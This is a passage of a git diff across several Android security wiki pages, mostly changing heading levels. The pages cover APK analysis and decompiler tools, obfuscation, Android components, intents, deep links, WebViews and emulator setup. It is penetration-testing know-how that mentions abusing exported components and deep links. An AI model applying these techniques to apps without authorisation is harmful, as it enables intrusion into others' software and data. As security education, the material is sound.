SUPER is a command-line application that can be used in Windows, MacOS X and Linux, that analyzes _.apk_ files in search for vulnerabilities. It does this by decompressing APKs and applying a series of rules to detect those vulnerabilities.
|
||||
|
||||
|
@ -608,7 +607,7 @@ Download the latest binaries from in the [download page](https://superanalyzer.r
|
|||
super-analyzer {apk_file}
|
||||
```
|
||||
|
||||
### [StaCoAn](https://github.com/vincentcox/StaCoAn)
|
||||
#### [StaCoAn](https://github.com/vincentcox/StaCoAn)
|
||||
|
||||
![](<../../.gitbook/assets/image (62).png>)
|
||||
|
||||
|
@ -622,7 +621,7 @@ Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
|
|||
./stacoan
|
||||
```
|
||||
|
||||
### [AndroBugs](https://github.com/AndroBugs/AndroBugs\_Framework)
|
||||
#### [AndroBugs](https://github.com/AndroBugs/AndroBugs\_Framework)
|
||||
|
||||
AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications.\
|
||||
[Windows releases](https://github.com/AndroBugs/AndroBugs\_Framework/releases)
|
||||
|
@ -632,7 +631,7 @@ python androbugs.py -f [APK file]
|
|||
androbugs.exe -f [APK file]
|
||||
```
|
||||
|
||||
### [Androwarn](https://github.com/maaaaz/androwarn)
|
||||
#### [Androwarn](https://github.com/maaaaz/androwarn)
|
||||
|
||||
**Androwarn** is a tool whose main aim is to detect and warn the user about potential malicious behaviours developped by an Android application.
|
||||
|
||||
|
@ -644,7 +643,7 @@ This tool looks for **common behavior of "bad" applications** like: Telephony id
|
|||
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
|
||||
```
|
||||
|
||||
### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
|
||||
#### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
|
||||
|
||||
![](<../../.gitbook/assets/image (81).png>)
|
||||
|
||||
|
@ -659,15 +658,15 @@ It is able to:
|
|||
* Analyze found domains using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
|
||||
* Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com)
|
||||
|
||||
### Koodous
|
||||
#### Koodous
|
||||
|
||||
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
||||
|
||||
## Obfuscating/Deobfuscating code
|
||||
### Obfuscating/Deobfuscating code
|
||||
|
||||
Note that depending the service and configuration you use to obfuscate the code. Secrets may or may not ended obfuscated.
|
||||
|
||||
### [ProGuard](https://en.wikipedia.org/wiki/ProGuard\_\(software\))
|
||||
#### [ProGuard](https://en.wikipedia.org/wiki/ProGuard\_\(software\))
|
||||
|
||||
**ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. It is able to optimize bytecode as well as detect and remove unused instructions. ProGuard is free software and is distributed under the GNU General Public License, version 2.
|
||||
|
||||
|
@ -675,40 +674,40 @@ ProGuard is distributed as part of the Android SDK and runs when building the ap
|
|||
|
||||
From: [https://en.wikipedia.org/wiki/ProGuard\_(software)](https://en.wikipedia.org/wiki/ProGuard\_\(software\))
|
||||
|
||||
### [DeGuard](http://apk-deguard.com)
|
||||
#### [DeGuard](http://apk-deguard.com)
|
||||
|
||||
#### DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.
|
||||
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
|
||||
|
||||
You can upload an obfuscated APK to their platform.
|
||||
|
||||
### [Simplify](https://github.com/CalebFenton/simplify)
|
||||
#### [Simplify](https://github.com/CalebFenton/simplify)
|
||||
|
||||
It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
|
||||
|
||||
### [APKiD](https://github.com/rednaga/APKiD)
|
||||
#### [APKiD](https://github.com/rednaga/APKiD)
|
||||
|
||||
APKiD gives you information about **how an APK was made**. It identifies many **compilers**, **packers**, **obfuscators**, and other weird stuff. It's [_PEiD_](https://www.aldeid.com/wiki/PEiD) for Android.
|
||||
|
||||
### Manual
|
||||
#### Manual
|
||||
|
||||
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
|
||||
|
||||
## Labs
|
||||
### Labs
|
||||
|
||||
### [Androl4b](https://github.com/sh4hin/Androl4b)
|
||||
#### [Androl4b](https://github.com/sh4hin/Androl4b)
|
||||
|
||||
AndroL4b is an Android security virtual machine based on ubuntu-mate includes the collection of latest framework, tutorials and labs from different security geeks and researchers for reverse engineering and malware analysis.
|
||||
|
||||
### OWASP
|
||||
#### OWASP
|
||||
|
||||
{% embed url="https://github.com/OWASP/owasp-mstg%0Ahttps://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication" %}
|
||||
|
||||
### Git Repos
|
||||
#### Git Repos
|
||||
|
||||
[https://github.com/riddhi-shree/nullCommunity/tree/master/Android](https://github.com/riddhi-shree/nullCommunity/tree/master/Android)\
|
||||
[https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab\_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab\_channel=B3nacSec)
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
For more information visit:
|
||||
|
||||
|
@ -717,12 +716,11 @@ For more information visit:
|
|||
* [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/)
|
||||
* [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh)
|
||||
|
||||
## To Test
|
||||
### To Test
|
||||
|
||||
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
|
||||
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -738,5 +736,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Android Applications Basics
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,31 +16,30 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Android Applications Basics
|
||||
|
||||
# Android Applications Basics
|
||||
|
||||
## Android Security Model
|
||||
### Android Security Model
|
||||
|
||||
**There are two layers:**
|
||||
|
||||
* The **OS**, which keeps installed applications isolated from one another.
|
||||
* The **application itself**, which allows developers to **expose certain functionalities** and configures application capabilities.
|
||||
|
||||
### UID Separation
|
||||
#### UID Separation
|
||||
|
||||
**Each application is assigned a specific User ID**. This is done during the installation of the app so t**he app can only interact with files owned by its User ID or shared** files. Therefore, only the app itself, certain components of the OS and the root user can access the apps data.
|
||||
|
||||
### UID Sharing
|
||||
#### UID Sharing
|
||||
|
||||
**Two applications can be configured to use the same UID**. This can be useful to share information, but if one of them is compromised the data of both applications will be compromised. This is why this behaviour is **discourage**.\
|
||||
**To share the same UID, applications must define the same `android:sharedUserId` value in their manifests.**
|
||||
|
||||
### Sandboxing
|
||||
#### Sandboxing
|
||||
|
||||
The **Android Application Sandbox** allows to run **each application** as a **separate process under a separate user ID**. Each process has its own virtual machine, so an app’s code runs in isolation from other apps.\
|
||||
From Android 5.0(L) **SELinux** is enforced. Basically, SELinux denied all process interactions and then created policies to **allow only the expected interactions between them**.
|
||||
|
||||
### Permissions
|
||||
#### Permissions
|
||||
|
||||
When you installs an **app and it ask for permissions**, the app is asking for the permissions configured in the **`uses-permission`** elements in the **AndroidManifest.xml** file. The **uses-permission** element indicates the name of the requested permission inside the **name** **attribute.** It also has the **maxSdkVersion** attribute which stops asking for permissions on versions higher than the one specified.\
|
||||
Note that android applications don't need to ask for all the permissions at the beginning, they can also **ask for permissions dynamically** but all the permissions must be **declared** in the **manifest.**
|
||||
|
@ -56,7 +55,7 @@ A permission element has three attributes:
|
|||
* **Signature**: Only **apps signed by the same certificate as the one** exporting the component can be granted permission. This is the strongest type of protection.
|
||||
* **SignatureOrSystem**: Only **apps signed by the same certificate as the one** exporting the component or **apps running with system-level access** can be granted permissions
|
||||
|
||||
## Pre-Installed Applications
|
||||
### Pre-Installed Applications
|
||||
|
||||
These apps are generally found in the **`/system/app`** or **`/system/priv-app`** directories and some of them are **optimised** (you may not even find the `classes.dex` file). Theses applications are worth checking because some times they are **running with too many permissions** (as root).
|
||||
|
||||
|
@ -64,7 +63,7 @@ These apps are generally found in the **`/system/app`** or **`/system/priv-app`*
|
|||
* Added by the device **manufacturer**
|
||||
* Added by the cell **phone provider** (if purchased from them)
|
||||
|
||||
## Rooting
|
||||
### Rooting
|
||||
|
||||
In order to obtain root access into a physical android device you generally need to **exploit** 1 or 2 **vulnerabilities** which use to be **specific** for the **device** and **version**.\
|
||||
Once the exploit has worked, usually the Linux `su` binary is copied into a location specified in the user's PATH env variable like `/system/xbin`.
|
||||
|
@ -75,22 +74,22 @@ Once the su binary is configured, another Android app is used to interface with
|
|||
Note that the rooting process is very dangerous and can damage severely the device
|
||||
{% endhint %}
|
||||
|
||||
### ROMs
|
||||
#### ROMs
|
||||
|
||||
It's possible to **replace the OS installing a custom firmware**. Doing this it's possible to extend the usefulness of an old device, bypass software restrictions or gain access to the latest Android code.\
|
||||
**OmniROM** and **LineageOS** are two of the most popular firmwares to use.
|
||||
|
||||
Note that **not always is necessary to root the device** to install a custom firmware. **Some manufacturers allow** the unlocking of their bootloaders in a well-documented and safe manner.
|
||||
|
||||
### Implications
|
||||
#### Implications
|
||||
|
||||
Once a device is rooted, any app could request access as root. If a malicious application gets it, it can will have access to almost everything and it will be able to damage the phone.
|
||||
|
||||
## Android Application Fundamentals <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
|
||||
### Android Application Fundamentals <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
|
||||
|
||||
This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html](https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html)
|
||||
|
||||
### Fundamentals Review <a href="#fundamentals-review" id="fundamentals-review"></a>
|
||||
#### Fundamentals Review <a href="#fundamentals-review" id="fundamentals-review"></a>
|
||||
|
||||
* Android applications are in the _APK file format_. **APK is basically a ZIP file**. (You can rename the file extension to .zip and use unzip to open and see its contents.)
|
||||
* APK Contents (Not exhaustive)
|
||||
|
@ -114,7 +113,7 @@ This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\
|
|||
* res/
|
||||
* the directory containing resources not compiled into resources.arsc
|
||||
|
||||
### **Dalvik & Smali**
|
||||
#### **Dalvik & Smali**
|
||||
|
||||
Most Android applications are written in Java. Kotlin is also supported and interoperable with Java. For ease, for the rest of this workshop, when I refer to “Java”, you can assume that I mean “Java or Kotlin”. **Instead of the Java code being run in Java Virtual Machine** (JVM) like desktop applications, in Android, the **Java is compiled to the \_Dalvik Executable (DEX) bytecode**\_\*\* format\*\*. For earlier versions of Android, the bytecode was translated by the Dalvik virtual machine. For more recent versions of Android, the Android Runtime (ART) is used.\
|
||||
If developers, write in Java and the code is compiled to DEX bytecode, to reverse engineer, we work the opposite direction.\
|
||||
|
@ -126,7 +125,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
|
|||
|
||||
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
|
||||
|
||||
## Intents
|
||||
### Intents
|
||||
|
||||
Intents are the primary means by which Android apps communicate between their components or with other apps. These message objects can also carry data between apps or component, similar to how GET/POST requests are used in HTTP communications.
|
||||
|
||||
|
@ -141,7 +140,7 @@ To be simple Intent can be used:
|
|||
|
||||
Improper implementation could result in data leakage, restricted functions being called and program flow being manipulated.
|
||||
|
||||
### Intent-Filter
|
||||
#### Intent-Filter
|
||||
|
||||
An Intent Filter specify the **types of Intent that an activity, service, or Broadcast Receiver can respond to**. It specifies what an activity or service can do and what types of broadcasts a Receiver can handle. It allows the corresponding component to receive Intents of the declared type. Intent Filters are typically **defined via the AndroidManifest.xml file**. For **Broadcast Receiver** it is also possible to define them in **coding**. An Intent Filter is defined by its category, action and data filters. It can also contain additional metadata.
|
||||
|
||||
|
@ -150,7 +149,7 @@ developers can **explicitly make components private** (regardless of any intent
|
|||
by setting the \*\* `exported` attribute to `false`\*\* for each component in the manifest file.\
|
||||
Developers can also set the **`permission`** attribute to **require a certain permission to access** the component, thereby restricting access to the component.
|
||||
|
||||
### Implicit Intents
|
||||
#### Implicit Intents
|
||||
|
||||
Intents are programatically created using an Intent constructor:
|
||||
|
||||
|
@ -175,7 +174,7 @@ An intent-filter needs to match the **action**, **data** and **category** to rec
|
|||
|
||||
The "Intent resolution" process determine which app should receive each message. This process considers the **priority attribute**, which can be set in the i**ntent-filter declaration**, and t**he one with the higher priority will be selected**. This priority can be set between -1000 and 1000 and applications can use the `SYSTEM_HIGH_PRIORITY` value. If a **conflict** arises, a "choser" Window appears so the **user can decide**.
|
||||
|
||||
### Explicit Intents
|
||||
#### Explicit Intents
|
||||
|
||||
An explicit intent specifies the class name it's targeting:
|
||||
|
||||
|
@ -191,11 +190,11 @@ intent.setClassName("com.other.app", "com.other.app.ServiceName");
|
|||
context.startService(intent);
|
||||
```
|
||||
|
||||
### Pending Intents
|
||||
#### Pending Intents
|
||||
|
||||
These allow other applications to **take actions on behalf of your application**, using your app's identity and permissions. Constructing a Pending Intent it should be **specified an intent and the action to perform**. If the **declared intent isn't Explicit** (doesn't declare which intent can call it) a **malicious application could perform the declared action** on behalf of the victim app. Moreover, **if an action ins't specified**, the malicious app will be able to do **any action on behalf the victim**.
|
||||
|
||||
### Broadcast Intents
|
||||
#### Broadcast Intents
|
||||
|
||||
Unlike the previous intents, which are only received by one app, broadcast intents **can be received by multiple apps**. However, from API version 14, it's **possible to specify the app that should receive** the message using Intent.set Package.
|
||||
|
||||
|
@ -206,7 +205,7 @@ There are **two types** of Broadcasts: **Normal** (asynchronous) and **Ordered**
|
|||
It's possible to **send** a **broadcast** using the function \*\*`sendBroadcast(intent, receiverPermission)` \*\* from the `Context` class.\
|
||||
You could also use the function **`sendBroadcast`** from the **`LocalBroadCastManager`** ensures the **message never leaves the app**. Using this you won't even need to export a receiver component.
|
||||
|
||||
### Sticky Broadcasts
|
||||
#### Sticky Broadcasts
|
||||
|
||||
This kind of Broadcasts **can be accessed long after they were sent**.\
|
||||
These were deprecated in API level 21 and it's recommended to **not use them**.\
|
||||
|
@ -214,7 +213,7 @@ These were deprecated in API level 21 and it's recommended to **not use them**.\
|
|||
|
||||
If you find functions containing the word "sticky" like **`sendStickyBroadcast`** or **`sendStickyBroadcastAsUser`**, **check the impact and try to remove them**.
|
||||
|
||||
## Deep links / URL schemes
|
||||
### Deep links / URL schemes
|
||||
|
||||
**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called:
|
||||
|
||||
|
@ -242,11 +241,11 @@ In this case you could try to abuse the functionality creating a web with the fo
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
|
||||
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
|
||||
|
||||
## AIDL - Android Interface Definition Language
|
||||
### AIDL - Android Interface Definition Language
|
||||
|
||||
The **Android Interface Definition Language** (AIDL) allows you to define the programming interface that both the client and service agree upon in order to **communicate with each other using interprocess communication** (IPC). On Android, **one process cannot normally access the memory of another process**. So to talk, they need to decompose their objects into primitives that the **operating system** can understand, and marshall the objects across that boundary for you. The code to do that marshalling is tedious to write, so Android handles it for you with AIDL.).
|
||||
|
||||
|
@ -254,19 +253,19 @@ Services using AIDL are referred to as **Bound Services**. In the Service's clas
|
|||
|
||||
A bound service is the server in a client-server interface. **It allows components (such as activities) to bind to the service, send requests, receive responses, and perform interprocess communication** (IPC). A bound service typically lives only while it serves another application component and does not run in the background indefinitely.
|
||||
|
||||
### Messenger
|
||||
#### Messenger
|
||||
|
||||
A Messenger is another type of IPC mechanism. Since the **Messenger is also a "Bound Service"**, the data passed from the client app is also processed through the `onBind` method. So, the code review should start on this method and you should look for the invocation of sensitive functionality or unsafe handling of data.
|
||||
|
||||
### Binder
|
||||
#### Binder
|
||||
|
||||
It's weird to find a Binder class directly invoked as it's much easier to use AIDL (which abstracts the Binder class). However, it's good to know that **Binder is a kernel-level driver which moves data from one process's memory to another's** ([https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8)).
|
||||
|
||||
## Components
|
||||
### Components
|
||||
|
||||
These include: **Activities, Services, Broadcast Receivers and Providers.**
|
||||
|
||||
### Launcher Activity and other activities
|
||||
#### Launcher Activity and other activities
|
||||
|
||||
An **Android activity** is one screen of the **Android** app's user interface. In that way an **Android activity** is very similar to windows in a desktop application. An **Android** app may contain one or more activities, meaning one or more screens.
|
||||
|
||||
|
@ -294,13 +293,13 @@ Also, **some activities returns data to a caller**. In these scenarios you need
|
|||
|
||||
**The code of an activity starts with the `onCreate` method.**
|
||||
|
||||
### Application Subclass
|
||||
#### Application Subclass
|
||||
|
||||
Android applications can define a **subclass** of [Application](https://developer.android.com/reference/android/app/Application). Applications can, but do not have to define a custom subclass of Application. If an Android app defines an Application subclass, t**his class is instantiated prior to any other class in the application**.
|
||||
|
||||
If the **`attachBaseContext`** method is defined in the Application subclass, it is called first, before the **`onCreate`** method.
|
||||
|
||||
### Services
|
||||
#### Services
|
||||
|
||||
[Services](https://developer.android.com/guide/components/services) **run in the background without a UI.** They are used to perform **long-running processes, even if the user starts using a different application**.
|
||||
|
||||
|
@ -318,7 +317,7 @@ A **service can be exported which allows other processes on the device to start
|
|||
<service android:name=".ExampleExportedService" android:exported="true"/>
|
||||
```
|
||||
|
||||
### Broadcast Receivers
|
||||
#### Broadcast Receivers
|
||||
|
||||
Broadcasts can be thought of a messaging system and **broadcast receivers are the listeners**. If an application has registered a receiver for a specific broadcast, the code in that receiver is executed when the system sends the broadcast. Note that in this case **several apps can receive the same message**.
|
||||
|
||||
|
@ -339,7 +338,7 @@ Broadcast can be **asynchronous** (every receiver receives it) or **synchronous*
|
|||
To **examine** the **code** implemented into a Broadcast Receiver you need to search for the **`onReceive`** method of the class of the receiver.\
|
||||
Note that **Ordered Broadcasts can drop the Intent received or even modify it** using one of the setter methods. Therefore, the **receivers should validate the data**.
|
||||
|
||||
### Content Provider
|
||||
#### Content Provider
|
||||
|
||||
Content Providers are the way **apps share structured data**, such as relational databases. Therefore, it's very important to use **permissions** and set the appropriate protection level to protect them.\
|
||||
Content Providers can use the **`readPermission`** and **`writePermission`** attributes to specify which permissions an app must have. **These permissions take precedence over the permission attribute**.\
|
||||
|
@ -365,7 +364,7 @@ It's **important to validate and sanitise the received input** to avoid potentia
|
|||
* delete()
|
||||
* query()
|
||||
|
||||
#### FileProvider
|
||||
**FileProvider**
|
||||
|
||||
This is a type of Content Provider that will **share files** from a folder. You can declare a file provider like this:
|
||||
|
||||
|
@ -396,7 +395,7 @@ The `<paths>` element can have multiple children, each specifying a different di
|
|||
|
||||
[More information about FileProviders here](https://developer.android.com/training/secure-file-sharing/setup-sharing).
|
||||
|
||||
## WebViews
|
||||
### WebViews
|
||||
|
||||
WebViews are effectively **web browsers** embedded into Android Apps.\
|
||||
WebViews content can be pulled from remote sites or can be files included in the app.\
|
||||
|
@ -423,27 +422,26 @@ By default, local files can be accessed by WebViews via file:// URLs, but there
|
|||
* The method **`setAllowFileAccess`** indicates if a path from a `file://` URL should be able to access the content from other file scheme URLs.
|
||||
* The method **`setAllowUniversalAccessFromFileURLs`** indicates if a path from a `file://` URL should be able to access content from any origin.
|
||||
|
||||
## Other App components
|
||||
### Other App components
|
||||
|
||||
### **Application Signing**
|
||||
#### **Application Signing**
|
||||
|
||||
* Android requires that **all apps be digitally signed with a certificate** before they can be installed. Android uses this certificate to identify the author of an app.
|
||||
* To run application on the device, it should be signed.When application is installed on to a device the **package manager verifies** that whether the application has been properly signed with the certificate in the apk file or not.
|
||||
* Application can be self signed or can be signed through CA.
|
||||
* Application signing ensures that one application can’t access any other application except through well-defined IPC and also that it is passed unmodified to the device.
|
||||
|
||||
### **Application Verification**
|
||||
#### **Application Verification**
|
||||
|
||||
* Android 4.2 and later support application verification. Users can choose to enable “Verify Apps” and have applications evaluated by an application verifier prior to installation.
|
||||
* App verification can alert the user if they try to install an app that might be harmful; if an application is especially bad, it can block installation.
|
||||
|
||||
## Mobile Device Management
|
||||
### Mobile Device Management
|
||||
|
||||
MDM or Mobile Device Management are software suits that are used to **ensure a control and security requirements** over mobile devices. These suites use the features referred as Device Administration API and require an Android app to be installed.
|
||||
|
||||
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -459,5 +457,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# APK decompilers
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## APK decompilers
|
||||
|
||||
# APK decompilers
|
||||
|
||||
### [JD-Gui](https://github.com/java-decompiler/jd-gui)
|
||||
#### [JD-Gui](https://github.com/java-decompiler/jd-gui)
|
||||
|
||||
First famous gui Java decompiler, you could use it to investigate the Java code from the APK once you have obtained it.
|
||||
|
||||
### [Jadx](https://github.com/skylot/jadx)
|
||||
#### [Jadx](https://github.com/skylot/jadx)
|
||||
|
||||
Buildin Java (multi-platform)and at this moment I think it's the recommended one.\
|
||||
Just **download** the **latest** version and execute it from the _**bin**_ folder:
|
||||
|
@ -49,15 +48,15 @@ Some **interesting options of jadx** (GUI and CLI versions) are:
|
|||
--no-imports #Always write entire package name (very useful to know where is the function that you might want to hook)
|
||||
```
|
||||
|
||||
### [GDA-android-reversing-Tool](https://github.com/charles2gan/GDA-android-reversing-Tool)
|
||||
#### [GDA-android-reversing-Tool](https://github.com/charles2gan/GDA-android-reversing-Tool)
|
||||
|
||||
GDA is also a powerful and fast reverse analysis platform. Which does not only supports the basic decompiling operation, but also many excellent functions like **Malicious behavior detection, Privacy leaking detection, Vulnerability detection, Path solving, Packer identification, Variable tracking analysis, Deobfuscation, Python& Java scripts, Device memory extraction, Data decryption and encryption** etc\*\*.\*\*
|
||||
|
||||
**Only for Windows.**
|
||||
|
||||
![](<../../.gitbook/assets/image (207) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (207) (1).png>)
|
||||
|
||||
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
|
||||
#### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
|
||||
|
||||
Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**](https://github.com/Konloch/bytecode-viewer/releases)**.** It allows you to decompile the APK using **several decompilers at the same time**. Then, you can see for example, 2 different Java decompilers and one Smali decompiler. It allows you also to **modify** the code:
|
||||
|
||||
|
@ -66,12 +65,12 @@ Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**]
|
|||
If you modify the code, then you can **export it**.\
|
||||
One bad thing of bytecode-viewer is that it **doesn't have references** or **cross-references.**
|
||||
|
||||
### [**Enjarify**](https://github.com/Storyyeller/enjarify)
|
||||
#### [**Enjarify**](https://github.com/Storyyeller/enjarify)
|
||||
|
||||
Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.\
|
||||
Dex2jar is an older tool that also tries to translate Dalvik to Java bytecode. It works reasonably well most of the time, but a lot of obscure features or edge cases will cause it to fail or even silently produce incorrect results. By contrast, Enjarify is designed to work in as many cases as possible, even for code where Dex2jar would fail. Among other things, Enjarify correctly handles unicode class names, constants used as multiple types, implicit casts, exception handlers jumping into normal control flow, classes that reference too many constants, very long methods, exception handlers after a catchall handler, and static initial values of the wrong type.
|
||||
|
||||
### [CFR](https://github.com/leibnitz27/cfr)
|
||||
#### [CFR](https://github.com/leibnitz27/cfr)
|
||||
|
||||
CFR will decompile modern Java features - [including much of Java ](https://www.benf.org/other/cfr/java9observations.html)[9](https://github.com/leibnitz27/cfr/blob/master/java9stringconcat.html), [12](https://www.benf.org/other/cfr/switch\_expressions.html) & [14](https://www.benf.org/other/cfr/java14instanceof\_pattern), but is written entirely in Java 6, so will work anywhere! ([FAQ](https://www.benf.org/other/cfr/faq.html)) - It'll even make a decent go of turning class files from other JVM languages back into java!
|
||||
|
||||
|
@ -91,7 +90,7 @@ This example will allow a maximum of 4GB to be allocated.
|
|||
|
||||
In the output directory, you will find the decompiled `.java` files, together with a summary of the decompilation
|
||||
|
||||
### [Fernflower](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine)
|
||||
#### [Fernflower](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine)
|
||||
|
||||
Next up is [Fernflower](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine), which is part of [IntelliJ IDEA](https://www.jetbrains.com/idea/). Everyone mentions that it is an _analytical_ decompiler (as stated in their project description), but nobody points out what this actually means. I only found [this Stackoverflow question](https://stackoverflow.com/q/62298929), which unfortunately remains unanswered as of today.
|
||||
|
||||
|
@ -111,7 +110,7 @@ java -jar ./fernflower.jar "$JARFILE" "$OUTDIR"
|
|||
|
||||
Among the decompilers described here, this is the only one that outputs the generated `.java` files in a JAR file. You can easily extract the source files using `unzip`.
|
||||
|
||||
### [Krakatau](https://github.com/Storyyeller/Krakatau)
|
||||
#### [Krakatau](https://github.com/Storyyeller/Krakatau)
|
||||
|
||||
Remember Enjarify from above? The very same author is also the developer of a decompiler named [Krakatau](https://github.com/Storyyeller/Krakatau).
|
||||
|
||||
|
@ -141,7 +140,7 @@ Given this file, we can run Krakatau as follows.
|
|||
|
||||
Let me refer to the project’s GitHub for an explanation of the parameters. Just note that for any libraries used by your JAR file, Krakatau will require you to add it as a JAR file to the `-path` flag.
|
||||
|
||||
### [procyon](https://github.com/mstrobel/procyon)
|
||||
#### [procyon](https://github.com/mstrobel/procyon)
|
||||
|
||||
Once installed, the usage is straightforward.
|
||||
|
||||
|
@ -149,11 +148,10 @@ Once installed, the usage is straightforward.
|
|||
procyon -jar "$JARFILE" -o "$OUTDIR"
|
||||
```
|
||||
|
||||
### References
|
||||
#### References
|
||||
|
||||
{% embed url="https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -169,5 +167,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# AVD - Android Virtual Device
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# AVD - Android Virtual Device
|
||||
## AVD - Android Virtual Device
|
||||
|
||||
Thank you very much to [**@offsecjay**](https://twitter.com/offsecjay) for his help while creating this content.
|
||||
|
||||
## What is
|
||||
### What is
|
||||
|
||||
Android Studio allows to **run virtual machines of Android that you can use to test APKs**. In order to use them you will need:
|
||||
|
||||
|
@ -30,7 +29,7 @@ Android Studio allows to **run virtual machines of Android that you can use to t
|
|||
|
||||
In Windows (in my case) **after installing Android Studio** I had the **SDK Tools installed in**: `C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
|
||||
|
||||
## JDK
|
||||
### JDK
|
||||
|
||||
For MacOS machines I recommend you to install the following version to be able to use the CLI commands mentioned in the following sections:
|
||||
|
||||
|
@ -38,9 +37,9 @@ For MacOS machines I recommend you to install the following version to be able t
|
|||
brew install openjdk@8
|
||||
```
|
||||
|
||||
## GUI
|
||||
### GUI
|
||||
|
||||
### Prepare Virtual Machine
|
||||
#### Prepare Virtual Machine
|
||||
|
||||
If you installed Android Studio, you can just open the main project view and access: _**Tools**_ --> _**AVD Manager.**_
|
||||
|
||||
|
@ -58,15 +57,15 @@ So, select it and click on _**Download**_\*\* (**now wait until the image is dow
|
|||
|
||||
The virtual machine will be created. Now **every time that you access AVD manager it will be present**.
|
||||
|
||||
### Run Virtual Machine
|
||||
#### Run Virtual Machine
|
||||
|
||||
In order to **run** it just press the _**Start button**_.
|
||||
|
||||
